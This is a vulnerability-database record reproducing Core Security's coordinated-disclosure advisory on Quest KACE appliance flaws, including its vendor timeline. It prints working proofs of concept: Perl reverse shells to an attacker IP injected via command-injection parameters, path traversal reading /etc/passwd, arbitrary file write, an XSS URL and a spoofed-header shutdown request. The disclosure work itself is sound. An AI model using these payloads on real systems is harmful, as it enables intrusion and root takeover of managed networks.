passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44950",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11138"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11138",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "44950",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10907",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11138",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"id": "VAR-201805-0598",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
}
]
},
"last_update_date": "2023-12-18T12:01:57.517000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementAppliance Command Injection Vulnerability (CNVD-2018-10907)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131203"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81228"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/44950/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11138"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/unix/http/quest_kace_systems_management_rce"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.557000",
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"date": "2019-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
],
"trust": 0.6
}
}
VAR-201805-0595
Vulnerability from variot - Updated: 2023-12-18 12:01The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks. Quest KACE Systems Management Appliance Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. The \342\200\230/adminui/error_details.php\342\200\231 script in QuestKACESystemManagementAppliance 8.0.318 has a PHP object injection vulnerability. An attacker can exploit this vulnerability to inject a PHP object and execute arbitrary commands. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. In particular, a blind time based type.
The following proof of concept induces a time delay:
